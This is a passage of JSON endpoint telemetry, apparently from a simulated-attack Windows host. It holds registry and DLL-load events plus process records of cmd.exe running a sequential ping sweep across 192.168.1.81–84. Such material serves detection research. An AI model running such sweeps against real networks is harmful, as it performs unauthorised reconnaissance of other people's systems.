"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": 
"sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", 
- "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883572367619984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ploptin.dll", - "image_path": "C:\\Windows\\System32\\ploptin.dll", - "pid": 4744, - "process_name": "explorer.exe", - "process_path": "C:\\Windows\\explorer.exe", - "timestamp": 131883572367460000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 4764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572371830000, - "unique_pid": 
"{42FC7E13-CB74-5C05-0000-0010F4465201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.81", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 556, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572371970000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 
556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572371990000, - 
"unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "event_type": "process", - "pid": 556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572376830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.82", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6016, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572376970000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376830000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6016, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": 
"{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572376990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "event_type": "process", - "pid": 6016, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572381990000, - "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.83", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3912, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572382190000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": 
"{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382140000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572382300000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "event_type": "process", - "pid": 3912, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572386830000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.84", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6280, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572387029984, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572386980000, - "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6280, - "process_name": "PING.EXE", - "process_path": 
